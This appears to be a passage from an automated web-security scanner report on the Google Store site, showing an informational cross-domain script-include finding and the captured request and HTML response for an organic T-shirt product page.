   showURL: false });
   $(".textpopup").tooltip({showURL: false,effect: "bouncy" });

$("#DoodleDrop").bind("change",function(){
var imgname = $('option:selected',this).attr("id");
var edpNo = '21283';
if(imgname!=""){
$("#ProductImage").attr("src","/images/DOODLES/"+imgname+"_A.jpg");
}
$("#ProductImageHref").attr("href","javascript:newWindow('/view_large.aspx?img=/images/DOODLES/"+imgname+"_.jpg+&edp_no="+edpNo+"',420,600)");
});

$("#searchfilters select").bind("change",function(){
var url = $('option:selected',this).val();
if(url!=""){window.location = url;}

});

});
</script>

<script src="https://www.google.com/jsapi" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js" type="text/javascript"></script>
<script src="https://www.google.com/cse/intl/en-US/sayt.js" type="text/javascript"></script><script type="text/javascript">
var searchText = document.getElementById('q');

var cx = '016458501645884057912:dq_ixbwhuk8';

var key = 'AIzaSyAl0tYGljRQwIcOS13gmbLkH0GssascyR4';
google.load('search', '1');

googleapis.load('shopping', 'v1');
sayt = saytInitialize(cx, key);

google.setOnLoadCallback(function() {
google.search.CustomSearchControl.attachAutoCompletion(
cx, searchText, 'searchForm', sayt.saytSubmit );
});
</script>

</div>
    </div>
    <script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write("<sc" + "ript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'>" + "</sc" + "ript>");
</script>

<script type="text/javascript">
var firstTracker = _gat._getTracker("UA-30481-1");
firstTracker._initData();
var ga = ga || {};
ga.special = 'regular';

ga.isNew = 'no';

firstTracker._setCustomVar(1, 'price', ga.special, 3);
firstTracker._setCustomVar(2, 'is new', ga.isNew, 3);
firstTracker._trackPageview();

var secondTracker = _gat._getTracker("UA-735212-16");
secondTracker._setLocalRemoteServerMode();
secondTracker._initData();
secondTracker._trackPageview();

</script>

<div id="backgroundPopup"></div>

   </body>
</html>

4.7. http://www.googlestore.com/Wearables/Organic+Black+is+Back+T-Shirt.axd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googlestore.com
Path:	/Wearables/Organic+Black+is+Back+T-Shirt.axd

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js
https://www.google.com/cse/intl/en-US/sayt.js
https://www.google.com/jsapi

Request

GET /Wearables/Organic+Black+is+Back+T-Shirt.axd HTTP/1.1
Host: www.googlestore.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.googlestore.com/googlesearch.aspx?category=eco
Cookie: ASP.NET_SessionId=4n1rd3u3ovrt2o45f1fvmo45; __utma=148589601.1599814706.1319223601.1319223601.1319223601.1; __utmb=148589601.10.10.1319223601; __utmc=148589601; __utmz=148589601.1319223601.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 36991
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Oct 2011 18:59:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>Organic Black is Back T-Shirt</title>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
       <meta name='keywords' content='' />
       <meta name='description' content='' />

<script type="text/javascript">
var r = Math.random();
var t = document.createElement("img");
t.onload = function() {
var t2 = document.createElement("img");
t2.onload = function() {
var t3 = document.createElement("img");
t3.onload = function() { return; };
t3.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp3&random=" + r;
};
t2.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp2&random=" + r;
};
t.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp1&random=" + r;
</script>
<noscript>
<img src="http://www.google-analytics.com/__utm.gif?label=ct_gs_exp_ns" />
</noscript>

<script language="JavaScript" type="text/JavaScript" src="/js/common.js"></script>
    <link href="/css/main.css" rel="stylesheet" type="text/css" />
    <link href="/css/home.css" rel="stylesheet" type="text/css" />
    
    <link rel="stylesheet" href="/css/syat.css" type="text/css" media="screen" />

<script type="text/javascript">
function click(theevent){
try{
firstTracker._trackEvent('product_page', theevent);
}catch(err){ }
}
</script>
   </head>
<body>
<div id="wrapper">
    <div id="header" style="height:70px">




        <a href="/shop.axd/Home"><img src="/images/googlestore_logo.gif" alt="GoogleStore" /></a>

    <div style="width:100%;position:absolute; top:0; right:0px; width:90px; height:52px;">
    <a href="/You+Tube/"><img style="border:0" src="/images/new_top_link.jpg" alt="Check Out the You Tube Items" /></a>
    </div>

    <ul>
    <li><a href="/You+Tube/">You Tube Home</a></li>
    <li><a href="http://www.google.com">Google Search</a></li>
    <li><a href="http://www.google.com/about.html">About Google</a></li>
    </ul>

    </div>

<div id="left_content">



<div class="box-round">
<div class="top"><span><h2 class="side_head">Categories</h2></span></div>
<div class="center-content">
<ul>
</li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/accessories_off.gif) left no-repeat;" href=/googlesearch.aspx?category=accessories >Accessories</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/fun_off.gif) left no-repeat;" href=/googlesearch.aspx?category=fun >Fun</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/kids_off.gif) left no-repeat;" href=/googlesearch.aspx?category=kids >Kids</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/office_off.gif) left no-repeat;" href=/googlesearch.aspx?category=office >Office</a></li><li class="nav on" style="position:relative;"><a class="main" style="background:url(/images/category_icons/wearables_on.gif) left no-repeat;" href=/googlesearch.aspx?category=wearables >Wearables</a><ul class="item_list"><li><a href="/Wearables/Tiki+Android+T-Shirt.axd">Tiki Android T-Shirt</a></li><li><a href="/Wearables/Google+Wallet+Full-Zip+Hoodie.axd">Google Wallet Full-Zip Hoodie</a></li><li><a href="/Wearables/Google+Circles+T-Shirt+White.axd">Google+ Circles T-Shirt White</a></li><li><a href="/Wearables/Google+Circles+T-shirts+Navy.axd">Google+ Circles T-shirts Navy</a></li><li><a href="/Wearables/Ladies+Full+Zip+Hoodie+with+Woman+s+Logo.axd">Ladies' Full Zip Hoodie with Woman's Logo</a></li><li><a href="/Wearables/Android+Concert+T-Shirt.axd">Android Concert T-Shirt</a></li><li><a href="/Wearables/Ladies+Glow+in+the+Dark+Ink+Tee.axd">Ladies Glow in the Dark Ink Tee</a></li><li><a href="/Wearables/Ladies+Lite+Color-Block+Jacket.axd">Ladies Lite Color-Block Jacket</a></li><li><a href="/Wearables/Gmail+Cap.axd">Gmail Cap</a></li><li><a href="/Wearables/Go+Gopher+T-Shirt.axd">Go Gopher T-Shirt</a></li><li><a href="/Wearables/Google+TV+T-Shirt.axd">Google TV T-Shirt</a></li><li><a href="/Wearables/Gmail+Full+Zip+Fleece.axd">Gmail Full Zip Fleece</a></li><li><a href="/Wearables/Honeycomb+Navy+T-Shirt.axd">Honeycomb Navy T-Shirt</a></li><li><a href="/Wearables/Honeycomb+White+T-Shirt.axd">Honeycomb White T-Shirt</a></li><li><a href="/Wearables/Google+Earth+Tee.axd">Google Earth Tee</a></li><li><a href="/Wearables/Android+Dragon+T-Shirt.axd">Android Dragon T-Shirt</a></li><li><a href="/Wearables/Champion+Polyester+Mesh+Shorts.axd">Champion Polyester Mesh Shorts</a></li><li><a href="/Wearables/Organic+Cotton+Android+walking+with+dog+T-shirt.axd">Organic Cotton Android walking with dog T-shirt</a></li><li><a href="/Wearables/Flexfit+Cap+L+XL+-+Dark+Grey.axd">Flexfit Cap L/XL - Dark Grey</a></li><li><a href="/Wearables/Gmail+Tuxedo+Tee.axd">Gmail Tuxedo Tee</a></li><li><a href="/Wearables/Men+s+4+oz+Triblend+T-Shirt.axd">Men's 4 oz. Triblend T-Shirt</a></li><li><a href="/Wearables/Men+s+Lombard+Thermal+T-Shirt.axd">Men's Lombard Thermal T-Shirt</a></li><li><a href="/Wearables/Ladies+Black+is+Back+T-Shirt.axd">Ladies Black is Back T-Shirt</a></li><li><a href="/Wearables/Long+Sleeve+Organic+Cotton+T-shirt.axd">Long Sleeve Organic Cotton T-shirt</a></li><li><a href="/Wearables/Ladies+Bella+Favorite+T-Shirt+in+4+colors.axd">Ladies Bella Favorite T-Shirt in 4 colors</a></li><li><a href="/Wearables/Men+s+Lite+Color-Block+Jacket.axd">Men's Lite Color-Block Jacket</a></li><li><a href="/Wearables/Ladies+Bella+V-Neck+T-Shirt.axd">Ladies Bella V-Neck T-Shirt</a></li><li><a href="/Wearables/Canvas+3+Button+Polo.axd">Canvas 3 Button Polo</a></li><li><a href="/Wearables/Triblend+Full+Zip+Hoodie.axd">Triblend Full Zip Hoodie</a></li><li><a href="/Wearables/Structured+Low+Profile+6+Panel+Cap.axd">Structured Low Profile 6 Panel Cap</a></li><li><a href="/Wearables/Chrome+Visor.axd">Chrome Visor</a></li><li><a href="/Wearables/Peninsula+Jacket.axd">Peninsula Jacket</a></li><li><a href="/Wearables/Flexfit+Cap+S+M+-+Dark+Grey.axd">Flexfit Cap S/M - Dark Grey</a></li><li><a href="/Wearables/Men+s+Burst+T-Shirt.axd">Men's Burst T-Shirt</a></li><li><a href="/Wearables/Ladies+Burst+T-Shirt.axd">Ladies' Burst T-Shirt</a></li><li><a href="/Wearables/Flip+Flops.axd">Flip Flops</a></li><li><a href="/Wearables/AA+Full+Zip+Hooded+Jacket+with+Gmail+Logo.axd">AA Full Zip Hooded Jacket with Gmail Logo</a></li><li><a href="/Wearables/Android+Cap.axd">Android Cap</a></li><li><a href="/Wearables/Google+Maps+Biking+T-Shirt.axd">Google Maps Biking T-Shirt</a></li><li><a href="/Wearables/Android+Skateboarder+T-Shirt.axd">Android Skateboarder T-Shirt</a></li><li><a href="/Wearables/Android+Restroom+Sign+T-Shirt.axd">Android Restroom Sign T-Shirt</a></li><li><a href="/Wearables/Ladies+Android+Pride+T-Shirt+-+Black.axd">Ladies' Android Pride T-Shirt - Black</a></li><li><a href="/Wearables/Android+Pride+T-Shirt+-+Black.axd">Android Pride T-Shirt - Black</a></li><li><a href="/Wearables/Sport-Tech+Fleece+Hoodie.axd">Sport-Tech Fleece Hoodie</a></li><li><a href="/Wearables/Anvil+Full+Zip+Organic+Hoodie.axd">Anvil Full Zip Organic Hoodie</a></li><li><a href="/Wearables/Alo+Ladies+Half-Zip+Pullover.axd">Alo Ladies Half-Zip Pullover</a></li><li><a href="/Wearables/Ladies+Soft+Shell+Jacket-Red.axd">Ladies Soft Shell Jacket-Red</a></li><li><a href="/Wearables/Unisex+1+4+Zip+Fleece.axd">Unisex 1/4 Zip Fleece</a></li><li><a href="/Wearables/Long+Sleeve+Organic+Crew.axd">Long Sleeve Organic Crew</a></li><li><a href="/Wearables/Full+Zip+Men+s+Fleece.axd">Full Zip Men's Fleece</a></li><li><a href="/Wearables/Ladies+Full+Zip+Fleece.axd">Ladies Full Zip Fleece</a></li><li><a href="/Wearables/Ladies+Thermal+Shirt.axd">Ladies Thermal Shirt</a></li><li><a href="/Wearables/Google+Voice+Fleece+Hoodie.axd">Google Voice Fleece Hoodie</a></li><li><a href="/Wearables/Google+Voice+T-shirt.axd">Google Voice T-shirt</a></li><li><a href="/Wearables/Tribeca+Full+Zip+Hoodie.axd">Tribeca Full Zip Hoodie</a></li><li><a href="/Wearables/Ladies+Android+Heart+T-Shirt.axd">Ladies Android Heart T-Shirt</a></li><li><a href="/Wearables/Ladies+Organic+Tee+-+Black.axd">Ladies' Organic Tee - Black</a></li><li><a href="/Wearables/Beanie+-+Navy+with+Ivory.axd">Beanie - Navy with Ivory</a></li><li><a href="/Wearables/Pro+Mesh+Cap+-+Black.axd">Pro Mesh Cap - Black</a></li><li><a href="/Wearables/Sport-Tek+Track+Jacket.axd">Sport-Tek Track Jacket</a></li><li><a href="/Wearables/Organic+Cotton+Long+Sleeve+T-Shirt.axd">Organic Cotton Long Sleeve T-Shirt</a></li><li><a class="product_on" href="/Wearables/Organic+Black+is+Back+T-Shirt.axd">Organic Black is Back T-Shirt</a></li><li><a href="/Wearables/Organic+Basic+T-Shirt.axd">Organic Basic T-Shirt</a></li><li><a href="/Wearables/Organic+Cotton+T-Shirt+-+Red.axd">Organic Cotton T-Shirt - Red</a></li><li><a href="/Wearables/Organic+Cotton+T-Shirt+-+Grey.axd">Organic Cotton T-Shirt - Grey</a></li><li><a href="/Wearables/Android+American+Apparel+Polo.axd">Android American Apparel Polo</a></li><li><a href="/Wearables/Organic+Cotton+Contrast+Stitch+Cap.axd">Organic Cotton Contrast Stitch Cap</a></li><li><a href="/Wearables/American+Apparel+Google+Polo.axd">American Apparel Google Polo</a></li><li><a href="/Wearables/Organic+Cotton+Basic+Crew+-+Unisex.axd">Organic Cotton Basic Crew - Unisex</a></li><li><a href="/Wearables/Chrome+T-Shirt.axd">Chrome T-Shirt</a></li><li><a href="/Wearables/Ladies+Bamboo+Tee.axd">Ladies Bamboo Tee</a></li><li><a href="/Wearables/Organic+Cotton+Cap+-+Black.axd">Organic Cotton Cap - Black</a></li><li><a href="/Wearables/Ladies+Soft+Shell+Hooded+Jacket.axd">Ladies Soft Shell Hooded Jacket</a></li><li><a href="/Wearables/Organic+Beanie.axd">Organic Beanie</a></li><li><a href="/Wearables/Men+s+Puffy+Vest.axd">Men's Puffy Vest</a></li><li><a href="/Wearables/Men+s+Bike+Jersey+-+Rasta.axd">Men's Bike Jersey - Rasta</a></li><li><a href="/Wearables/Men+s+Bike+Jersey+-+Android.axd">Men's Bike Jersey - Android</a></li><li><a href="/Wearables/Ladies+Bike+Jersey+-+Rasta.axd">Ladies Bike Jersey - Rasta</a></li><li><a href="/Wearables/Ladies+Bike+Jersey+-+Android.axd">Ladies Bike Jersey - Android</a></li><li><a href="/Wearables/Men+s+Akasha+Jacket.axd">Men's Akasha Jacket</a></li><li><a href="/Wearables/Google+Map+T-Shirt.axd">Google Map T-Shirt</a></li><li><a href="/Wearables/Men+s+Plasma+Schell+Jacket.axd">Men's Plasma Schell Jacket</a></li><li><a href="/Wearables/Classic+Men+s+Bib+Shorts+-+Android.axd">Classic Men's Bib Shorts - Android</a></li><li><a href="/Wearables/Classic+Men+s+Shorts+-+Android.axd">Classic Men's Shorts - Android</a></li><li><a href="/Wearables/Classic+Men+s+Bib+Shorts+-+Rasta.axd">Classic Men's Bib Shorts - Rasta</a></li><li><a href="/Wearables/Classic+Men+s+Shorts+-+Rasta.axd">Classic Men's Shorts - Rasta</a></li><li><a href="/Wearables/Classic+Ladies+Bib+Shorts+-+Android.axd">Classic Ladies Bib Shorts - Android</a></li><li><a href="/Wearables/Classic+Ladies+Shorts+-+Android.axd">Classic Ladies Shorts - Android</a></li><li><a href="/Wearables/Classic+Ladies+Bib+Shorts+-+Rasta.axd">Classic Ladies Bib Shorts - Rasta</a></li><li><a href="/Wearables/Classic+Ladies+Shorts+-+Rasta.axd">Classic Ladies Shorts - Rasta</a></li></ul></li><li class="nav off"><a class="main textpopup" onclick="recordOutboundLink(this, 'Outbound Links', 'Zazzle.com LeftNav');return false;" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." style="background:url(/images/category_icons/doodles_off.gif) left no-repeat;" href=http://www.zazzle.com/googledoodles >Doodles on Demand</a></li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>

<div class="box-round" style="margin-top:10px;">
<div class="top"><span><h2 class="side_head">Eco Reference</h2></span></div>
<div class="center-content">
<ul class="eco_guide">
<li style="background:url(/images/greeninitiative/1.jpg) no-repeat left;">Sustainable</li>
<li style="background:url(/images/greeninitiative/2.jpg) no-repeat left;">Organic</li>
<li style="background:url(/images/greeninitiative/3.jpg) no-repeat left;">Recycled</li>
<li style="background:url(/images/greeninitiative/4.jpg) no-repeat left;">Non-Polluting</li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>

</div>
<div id="content">

<script type="text/javascript" src="/js/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="/js/addtl.js"></script>
<link rel="stylesheet" href="/css/popup.css" />

<style type="text/css">
.search_top
{
    font-size:15px;
    margin-bottom:15px;
}
.search_top select{ font-size:13px;}
</style>

<div class="search_top">

<form action="/googlesearch.aspx" id="search" method="get">
<b>Search:</b>
<select name="category">

<option value="all">All Products</option>
<option value="eco" >Eco-Friendly</option>
<option value="wearables" >Wearables</option>
<option value="youtube" >You Tube</option>
<option value="accessories" >Accessories</option>
<option value="office" >Office</option>
<option value="doodles" >Doodles</option>
<option value="kids" >Kids</option>
<option value="fun" >Fun</option>
<option value="apps" >Apps</option>
</select>

<input name="q" id="q" autocomplete="off" class="searchbox" style="width:280px; color:#333;" value="keyword / item #" autocomplete="off" onfocus="if(this.value=='keyword / item #')value=''" onblur="if(this.value=='')value='keyword / item #';" type="text"/>
<input type="image" src="/images/btn_search.gif" class="button" value="search" />
</form>

</div>
<div id="product">

<h1>Wearables</h1>

<div id="breadcrumbs_only">

<a href="http://www.googlestore.com/shop.axd/Home">Home</a> <span>/</span>

<a href="/Wearables/">Wearables</a>
</div>
   <div id="product_info">

<script type="text/javascript" src="/js/style.js"></script>
<script type="text/javascript">
var styleProducts = new Array();
var styleDescriptions = new Array();

function addToWishList(frmName)
{
   var frm = document.forms[frmName];
   frm.action = '/shop.axd/AddToWishList';
   frm.submit();
}

function swatchImageClick(color)
{
   var fld = document.forms['frmProductDetails']['l2desc'];

   for(i = 0; i < fld.options.length; i++)
   {
       if (fld.options[i].value == color)
       {
           fld.selectedIndex = i;
           break;
       }
   }

   styleOnChange('frmProductDetails', '','10 13000 ', 2, 2, true);
}
</script>

<form action="/shop.axd/AddToCartBP" method="post" name="frmProductDetails">
<table border="0" cellpadding="10" cellspacing="0" width="100%" class="product_table">
<tr>
   <td valign="top" width="200">

<div id="product-image-wrap">
<a id="ProductImageHref" onclick="click('Enlarge Image')" style="text-decoration:none;" href="javascript:newWindow('/view_large.aspx?img=%2fcontent%2fimages%2flarge%2fgo13052.jpg&edp_no=7208',420,600)">
<img id="ProductImage" width="225px" src="/content/images/standard/go13052a.jpg" alt="" />
</a>
<img class="ecotags" src="/images/greeninitiative/organic_s.jpg" title="Made from materials grown without the use of harmful synthetic chemicals.">

<img style="position:absolute; top:0px;right:2px;" src="/content/Images/flagUSA.JPG" alt="Made In USA" title="Made In USA">

<div style="position:relative; overflow:hidden; width:215px">
<a style="float:left;" onclick="click('Enlarge Image')" href="javascript:newWindow('/view_large.aspx?img=%2fcontent%2fimages%2flarge%2fgo13052.jpg&edp_no=7208',420,600)" class="enlarge">Enlarge image</a>

<a style="float:right" onclick="click('Size Chart')" href="javascript:newWindow('/sizechart.aspx?img=%2fcontent%2fimages%2flarge%2fgo13052.jpg&edp_no=7208&itemno=10 13000',600,600,true)" class="enlarge">Size chart</a>

</div>
</div>

<span class='mhead' style='background:#FFF;'>Mouseover image to view</span><ul id="multiple"><li><a id="/content/Images/Large/01BlkisBkTeeBack.jpg" style="border:1px solid #FFF;" href="javascript:newWindow('/view_large.aspx?img=%2fcontent%2fimages%2flarge%2fgo13052.jpg&edp_no=7208',420,600)"><img id="0" style="border:1px solid #eee;" src="/content/Images/SuperThumb/01BlkisBkTeeBackC.jpg" alt=""></a><a id="/content/Images/Large/BlkT1.jpg" style="border:1px solid #FFF;" href="javascript:newWindow('/view_large.aspx?img=%2fcontent%2fimages%2flarge%2fgo13052.jpg&edp_no=7208',420,600)"><img id="1" style="border:1px solid #eee;" src="/content/Images/SuperThumb/BlkT1C.jpg" alt=""></a><a id="/content/Images/Large/BlkT2.jpg" style="border:1px solid #FFF;" href="javascript:newWindow('/view_large.aspx?img=%2fcontent%2fimages%2flarge%2fgo13052.jpg&edp_no=7208',420,600)"><img id="2" style="border:1px solid #eee;" src="/content/Images/SuperThumb/BlkT2C.jpg" alt=""></a><img id="i0" src="/content/Images/Standard/01BlkisBkTeeBackA.jpg" style="display:none;" /><img id="i1" src="/content/Images/Standard/BlkT1A.jpg" style="display:none;" /><img id="i2" src="/content/Images/Standard/BlkT2A.jpg" style="display:none;" /></li></ul>

<script type="text/javascript">

var mainSrc = $("#ProductImage").attr("src");
$("#multiple li a").bind("mouseenter", function(e){
$(this).css("border","1px solid #eee");
var ssrc = $(this).children("img").attr("src");
var inum = $(this).children("img").attr("id");
var medSrc = $("#i" + inum).attr("src");
if(medSrc == undefined){
medSrc = ssrc.replace("C.jpg","A.jpg");
}
$("#ProductImage").attr("src",medSrc);

});

$("#multiple li a").bind("mouseleave", function(e){
$(this).css("border","1px solid #FFF");
});

$("#multiple").bind("mouseleave", function(e){
$("#ProductImage").attr("src","/content/images/standard/go13052a.jpg");
});
</script>

</td>
        <td valign="top" class="product_details">
<h2>Organic Black is Back T-Shirt</h2>
        <b>Item #:</b> 10 13000<br /><br />
<p class="blocktext">Word on the street is that "black is the new black". Embellish your basic fashion statement with Google's brightly colored logo on an authentic American Apparel 100% organic combed cotton t-shirt for ultimate softness. This t-shirt has a flattering and stylish fit for virtually any body type. Features also include a baby rib cotton stretchable, reinforced shoulder construction to maintain shape through repeated washings and a durable double-stitched bottom hem. 4 color logo screened on front.

Sizes run smaller than normal. Please reference men's size chart for fit.</p>

        <div class="price">
<b>Price:</b> $17.20
</div>







<div class="product_colors">
<b>Available Colors:</b><br />
<ul>

                        <li>
                        <a href="javascript:swatchImageClick('BLACK');void(0);"><img style="border:1px solid #CCC;" src="/images/catalog/swatch/BLACK.jpg" alt="BLACK" width="20" height="20" border="0"></a>
                           </li>

</ul>
</div>

<table cellpadding="0" cellspacing="0">
<tr>
            <td colspan="2">

<script type="text/javascript" src="/js/prototype/style.js"></script>
<script lang="javascript">
styleProducts['10 13000 '] = new Array();

styleProducts['10 13000 '][0] = new Array("S","BLACK","BLACK", "$17.20" , "125", " In stock");

styleProducts['10 13000 '][1] = new Array("M","BLACK","BLACK", "$17.20" , "248", " In stock");

styleProducts['10 13000 '][2] = new Array("L","BLACK","BLACK", "$17.20" , "164", " In stock");

styleProducts['10 13000 '][3] = new Array("XL","BLACK","BLACK", "$17.20" , "136", " In stock");

styleProducts['10 13000 '][4] = new Array("2XL","BLACK","BLACK", "$19.30" , "136", " In stock");

styleProducts['10 13000 '][5] = new Array("3XL","BLACK","BLACK", "$21.95" , "43", " In stock");

styleDescriptions['10 13000 '] = new Array();

styleDescriptions['10 13000 '][1] = 'Size';

styleDescriptions['10 13000 '][2] = 'Color';

</script>

<table cellpadding="0" cellspacing="0" id="style_controls">
<tr>

<td><b>Size</b></td>

<td><b>Color</b></td>

<td><b>Qty</b></td>
</tr>
<tr>

<td><select id="" class="l1desc" name="l1desc" onchange="changeStyleMessage('frmProductDetails', 'l1desc','10 13000 ', 1, 2, true)">

<option id="" value="S" selected>S</option>

<option id="" value="M">M</option>

<option id="" value="L">L</option>

<option id="" value="XL">XL</option>

<option id="" value="2XL">2XL</option>

<option id="" value="3XL">3XL</option>

</select>
</td>

<td><select id="" class="l2desc" name="l2desc" onchange="changeStyleMessage('frmProductDetails', 'l2desc','10 13000 ', 2, 2, true)">

<option id="" value="BLACK" selected>BLACK - $17.20</option>

</select>
</td>

<td>
<select name="qty">

<option>0</option>

<option selected>1</option>

<option>2</option>

<option>3</option>

<option>4</option>

<option>5</option>

<option>6</option>

<option>7</option>

<option>8</option>

<option>9</option>

<option>10</option>

<option>11</option>

<option>12</option>

<option>13</option>

<option>14</option>

<option>15</option>

<option>16</option>

<option>17</option>

<option>18</option>

<option>19</option>

<option>20</option>

<option>21</option>

<option>22</option>

<option>23</option>

<option>24</option>

<option>25</option>

<option>26</option>

<option>27</option>

<option>28</option>

<option>29</option>

<option>30</option>

<option>31</option>

<option>32</option>

<option>33</option>

<option>34</option>

<option>35</option>

<option>36</option>

<option>37</option>

<option>38</option>

<option>39</option>

<option>40</option>

<option>41</option>

<option>42</option>

<option>43</option>

<option>44</option>

<option>45</option>

<option>46</option>

<option>47</option>

<option>48</option>

<option>49</option>

<option>50</option>

<option>51</option>

<option>52</option>

<option>53</option>

<option>54</option>

<option>55</option>

<option>56</option>

<option>57</option>

<option>58</option>

<option>59</option>

<option>60</option>

<option>61</option>

<option>62</option>

<option>63</option>

<option>64</option>

<option>65</option>

<option>66</option>

<option>67</option>

<option>68</option>

<option>69</option>

<option>70</option>

<option>71</option>

<option>72</option>

<option>73</option>

<option>74</option>

<option>75</option>

<option>76</option>

<option>77</option>

<option>78</option>

<option>79</option>

<option>80</option>

<option>81</option>

<option>82</option>

<option>83</option>

<option>84</option>

<option>85</option>

<option>86</option>

<option>87</option>

<option>88</option>

<option>89</option>

<option>90</option>

<option>91</option>

<option>92</option>

<option>93</option>

<option>94</option>

<option>95</option>

<option>96</option>

<option>97</option>

<option>98</option>

<option>99</option>

<option>100</option>

</select>
</td>
</tr>

<tr><td colspan="5"><span id="inventoryStatusMessage">
Select your Color/Size Combination
</span></td></tr>

</table>
<br /><br />

            </td>
        </tr>
        <tr>
            <td></td>
            <td>

<table cellpadding="0" cellspacing="0">
<tr>
<td align="left">

<a href="http://www.googlestore.com/Wearables/cid=447/shop.axd/Category"><img src="/images/btn_continueshopping.gif" border=0></a>


  

<input name="imageField" type="image" src="/images/btn_addtocart.gif" onclick="click('Add To Cart')" border="0" />

</td>
</tr>
</table>
</td>
</tr>
    </table>
   </td>
</tr>
</table>
   <input type="hidden" name="type" value="S">

<input type="hidden" name="cid" value="447">

<input type="hidden" name="style_id" value="10 13000 ">
<input type="hidden" name="edp_no" value="7208">

</form>

<br />
<b class="b_header">You may also like...</b>
<div id="cross_sells">
<ul>

<li>
<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkImageClick/Android Restroom Sign T-Shirt : Organic Black is Back T-Shirt');" href="/Wearables/Android+Restroom+Sign+T-Shirt.axd"><img src="/content/images/thumb/10-13064b.jpg" alt="Android Restroom Sign T-Shirt" /></a>
<div class="price">
<b>Price:</b> $12.65
</div>

<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkClick/Android Restroom Sign T-Shirt : Organic Black is Back T-Shirt');" href="/Wearables/Android+Restroom+Sign+T-Shirt.axd">Android Restroom Sign T-Shirt</a>
</li>

<li>
<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkImageClick/Organic Basic T-Shirt : Organic Black is Back T-Shirt');" href="/Wearables/Organic+Basic+T-Shirt.axd"><img src="/content/images/thumb/go13053b.jpg" alt="Organic Basic T-Shirt" /></a>
<div class="price">
<b>Price:</b> $18.25
</div>

<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkClick/Organic Basic T-Shirt : Organic Black is Back T-Shirt');" href="/Wearables/Organic+Basic+T-Shirt.axd">Organic Basic T-Shirt</a>
</li>

<li>
<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkImageClick/Organic Cotton T-Shirt - Grey : Organic Black is Back T-Shirt');" href="/Wearables/Organic+Cotton+T-Shirt+-+Grey.axd"><img src="/content/images/thumb/10 13008b.jpg" alt="Organic Cotton T-Shirt - Grey" /></a>
<div class="price">
<b>Price:</b> $13.40
</div>

<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkClick/Organic Cotton T-Shirt - Grey : Organic Black is Back T-Shirt');" href="/Wearables/Organic+Cotton+T-Shirt+-+Grey.axd">Organic Cotton T-Shirt - Grey</a>
</li>

<li>
<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkImageClick/Organic Cotton Long Sleeve T-Shirt : Organic Black is Back T-Shirt');" href="/Wearables/Organic+Cotton+Long+Sleeve+T-Shirt.axd"><img src="/content/images/thumb/10-13091b.jpg" alt="Organic Cotton Long Sleeve T-Shirt" /></a>
<div class="price">
<b>Price:</b> $16.00
</div>

<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkClick/Organic Cotton Long Sleeve T-Shirt : Organic Black is Back T-Shirt');" href="/Wearables/Organic+Cotton+Long+Sleeve+T-Shirt.axd">Organic Cotton Long Sleeve T-Shirt</a>
</li>

</ul>
</div>



   </div>

   <img src="http://int.teracent.net/tase/int?adv=296&fmt=redir&sec=0&pid=prod&prodID=1013000" width="1" height="1" />
</div>
</div>
<div id="right_content">



<style type="text/css">
.signup-tb{
width:135px;
font-size:.9em;
margin-top:5px;
margin-bottom:5px;
}

.signup-btn{
font-size:.9em;
}

.lblMessage{
font-weight:bold;

}

.formsuccess{
font-weight:bold;
color:green;
}

.formerror{
font-weight:bold;
color:red; }
</style>

<div class="box-round" style="margin-bottom:10px;">
<div class="top">
<span>
<h2 class="side_head">Newsletter Signup</h2>
</span>
</div>

<div class="center-content">
<span id="Template_ctlRightNav_ctlSignup_Label1" class="lblMessage">I want to receive promotional email from GatewayCDI.</span><br />
<form name="aspnetForm" method="post" action="#" id="aspnetForm">
<div>
